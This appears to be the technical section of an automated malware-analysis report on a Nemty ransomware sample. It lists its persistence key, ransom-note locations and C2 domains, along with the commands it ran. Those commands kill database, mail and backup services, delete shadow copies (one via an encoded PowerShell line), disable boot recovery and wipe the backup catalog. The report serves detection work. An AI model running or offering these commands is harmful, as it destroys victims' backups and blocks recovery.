Technical Information
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run\] 'daite drobovik' = '%TEMP%\XajVqeE17azmR6ppLKIUCvW8HWn0AEdY.exe'
- <Drive name for removable media>:\nemty_sphry2o-decrypt.txt
- <Drive name for removable media>:\split.avi
- <Drive name for removable media>:\dial.bmp
- <Drive name for removable media>:\dialmap.bmp
- <Drive name for removable media>:\tileimage.bmp
- <Drive name for removable media>:\coffee.bmp
- <Drive name for removable media>:\contoso_1.cer
- <Drive name for removable media>:\pmd.cer
- <Drive name for removable media>:\contoso.cer
- <Drive name for removable media>:\sdksampleunprivdeveloper.cer
- <Drive name for removable media>:\contosoroot.cer
- '%WINDIR%\syswow64\taskkill.exe' /f /im sql.*
- '%WINDIR%\syswow64\taskkill.exe' /f /im virtualboxvm.*
- '%WINDIR%\syswow64\taskkill.exe' /f /im onenote.*
- '%WINDIR%\syswow64\taskkill.exe' /f /im excel.*
- '%WINDIR%\syswow64\net.exe' stop QBVSS
- '%WINDIR%\syswow64\net.exe' stop QBCFMontorService
- '%WINDIR%\syswow64\net.exe' stop cbVSCService11
- '%WINDIR%\syswow64\taskkill.exe' /f /im oracle.*
- '%WINDIR%\syswow64\net.exe' stop CobianBackup11
- '%WINDIR%\syswow64\net.exe' stop SQLBrowser
- '%WINDIR%\syswow64\net.exe' stop SQLAgent$SQLEXPRESS
- '%WINDIR%\syswow64\taskkill.exe' /f /im thunderbird.*
- '%WINDIR%\syswow64\taskkill.exe' /f /im node.*
- '%WINDIR%\syswow64\net.exe' stop MongoDB
- '%WINDIR%\syswow64\net.exe' stop MSSQL$SQLEXPRESS
- '%WINDIR%\syswow64\taskkill.exe' /f /im outlook.*
- '%WINDIR%\syswow64\net.exe' stop SQLWriter
- '%WINDIR%\syswow64\net.exe' stop Apache2.4
- '%WINDIR%\syswow64\taskkill.exe' /f /im wordpad.*
- '%WINDIR%\syswow64\net.exe' stop AcronisAgent
- '%WINDIR%\syswow64\net.exe' stop AcrSch2Svc
- '%WINDIR%\syswow64\net.exe' stop OracleServiceXE
- '%WINDIR%\syswow64\taskkill.exe' /f /im winword.*
- '%WINDIR%\syswow64\net.exe' stop OracleXETNSListener
- '%WINDIR%\syswow64\net.exe' stop DbxSvc
- '%WINDIR%\syswow64\net.exe' stop MSSQLServerADHelper100
- '%WINDIR%\syswow64\taskkill.exe' /f /im QBW32.*
- %TEMP%\xajvqee17azmr6pplkiucvw8hwn0aedy.exe
- %APPDATA%\microsoft\crypto\rsa\s-1-5-21-1960123792-2022915161-3775307078-1001\518e2bc94bc324e5e6f82437175ae1af_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
- %APPDATA%\microsoft\crypto\rsa\s-1-5-21-1960123792-2022915161-3775307078-1001\650860e5119ec19a8de142e32f03c712_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
- %APPDATA%\microsoft\crypto\rsa\s-1-5-21-1960123792-2022915161-3775307078-1001\94a9cdfb09e37d01f75d09c2c4488906_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
- C:\nemty_sphry2o-decrypt.txt
- C:\documents and settings\nemty_sphry2o-decrypt.txt
- C:\far2\nemty_sphry2o-decrypt.txt
- C:\far2\addons\nemty_sphry2o-decrypt.txt
- C:\far2\addons\colors\nemty_sphry2o-decrypt.txt
- D:\nemty_sphry2o-decrypt.txt
- C:\far2\addons\colors\custom_highlighting\nemty_sphry2o-decrypt.txt
- C:\far2\addons\colors\default_highlighting\nemty_sphry2o-decrypt.txt
- <Drive name for removable media>:\split.avi
- <Drive name for removable media>:\dial.bmp
- <Drive name for removable media>:\dialmap.bmp
- <Drive name for removable media>:\tileimage.bmp
- <Drive name for removable media>:\coffee.bmp
- <Drive name for removable media>:\contoso_1.cer
- <Drive name for removable media>:\pmd.cer
- <Drive name for removable media>:\contoso.cer
- <Drive name for removable media>:\sdksampleunprivdeveloper.cer
- <Drive name for removable media>:\contosoroot.cer
- <Drive name for removable media>:\ovp25012015.doc
- C:\far2\addons\colors\custom_highlighting\descript.ion
- C:\far2\addons\colors\custom_highlighting\import_colors.bat
- C:\far2\addons\colors\default_highlighting\descript.ion
- C:\far2\addons\colors\default_highlighting\import_colors.bat
- 'my####rnalip.com':443
- 'my####rnalip.com':443
- DNS ASK my####rnalip.com
- DNS ASK ne##y10.hk
- ClassName: '' WindowName: ''
- '%TEMP%\xajvqee17azmr6pplkiucvw8hwn0aedy.exe'
- '%WINDIR%\syswow64\cmd.exe' /c vssadmin resize shadowstorage /for=A: /on=A: /maxsize=401MB' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c vssadmin resize shadowstorage /for=A: /on=A: /maxsize=unbounded' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c vssadmin resize shadowstorage /for=D: /on=D: /maxsize=401MB' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c vssadmin resize shadowstorage /for=D: /on=D: /maxsize=unbounded' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c vssadmin resize shadowstorage /for=F: /on=F: /maxsize=401MB' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c vssadmin resize shadowstorage /for=F: /on=F: /maxsize=unbounded' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c taskkill /f /im sql.* & taskkill /f /im winword.* & taskkill /f /im wordpad.* & taskkill /f /im outlook.* & taskkill /f /im thunderbird.* & taskkill /f /im oracle.* & taskkill /f /im excel.*...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c net stop DbxSvc & net stop OracleXETNSListener & net stop OracleServiceXE & net stop AcrSch2Svc & net stop AcronisAgent & net stop Apache2.4 & net stop SQLWriter & net stop MSSQL$SQLEXPRESS ...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet & wmic shadowcopy delete' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c vssadmin resize shadowstorage /for=A: /on=A: /maxsize=401MB
- '%WINDIR%\syswow64\net1.exe' stop OracleXETNSListener
- '%WINDIR%\syswow64\net1.exe' stop OracleServiceXE
- '%WINDIR%\syswow64\net1.exe' stop AcrSch2Svc
- '%WINDIR%\syswow64\net1.exe' stop AcronisAgent
- '%WINDIR%\syswow64\net1.exe' stop Apache2.4
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
- '%WINDIR%\syswow64\net1.exe' stop DbxSvc
- '%WINDIR%\syswow64\net1.exe' stop SQLWriter
- '%WINDIR%\syswow64\net1.exe' stop MongoDB
- '%WINDIR%\syswow64\net1.exe' stop SQLAgent$SQLEXPRESS
- '%WINDIR%\syswow64\net1.exe' stop SQLBrowser
- '%WINDIR%\syswow64\net1.exe' stop CobianBackup11
- '%WINDIR%\syswow64\net1.exe' stop cbVSCService11
- '%WINDIR%\syswow64\net1.exe' stop MSSQL$SQLEXPRESS
- '%WINDIR%\syswow64\net1.exe' stop MSSQLServerADHelper100
- '%WINDIR%\syswow64\cmd.exe' /c bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet & wmic shadowcopy delete
- '%WINDIR%\syswow64\cmd.exe' /c net stop DbxSvc & net stop OracleXETNSListener & net stop OracleServiceXE & net stop AcrSch2Svc & net stop AcronisAgent & net stop Apache2.4 & net stop SQLWriter & net stop MSSQL$SQLEXPRESS ...
- '%WINDIR%\syswow64\cmd.exe' /c taskkill /f /im sql.* & taskkill /f /im winword.* & taskkill /f /im wordpad.* & taskkill /f /im outlook.* & taskkill /f /im thunderbird.* & taskkill /f /im oracle.* & taskkill /f /im excel.*...
- '%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=A: /on=A: /maxsize=401MB
- '%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=A: /on=A: /maxsize=unbounded
- '%WINDIR%\syswow64\cmd.exe' /c vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB
- '%WINDIR%\syswow64\cmd.exe' /c vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded
- '%WINDIR%\syswow64\cmd.exe' /c vssadmin resize shadowstorage /for=D: /on=D: /maxsize=401MB
- '%WINDIR%\syswow64\cmd.exe' /c vssadmin resize shadowstorage /for=D: /on=D: /maxsize=unbounded
- '%WINDIR%\syswow64\cmd.exe' /c vssadmin resize shadowstorage /for=A: /on=A: /maxsize=unbounded
- '%WINDIR%\syswow64\cmd.exe' /c vssadmin resize shadowstorage /for=F: /on=F: /maxsize=401MB
- '%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=C: /on=C: /maxsize=401MB
- '%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=C: /on=C: /maxsize=unbounded
- '%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=D: /on=D: /maxsize=unbounded
- '%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=F: /on=F: /maxsize=unbounded
- '%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=D: /on=D: /maxsize=401MB
- '%WINDIR%\syswow64\vssadmin.exe' resize shadowstorage /for=F: /on=F: /maxsize=401MB
- '%WINDIR%\syswow64\cmd.exe' /c vssadmin resize shadowstorage /for=F: /on=F: /maxsize=unbounded
- '%WINDIR%\syswow64\net1.exe' stop QBCFMontorService
- '%WINDIR%\syswow64\net1.exe' stop QBVSS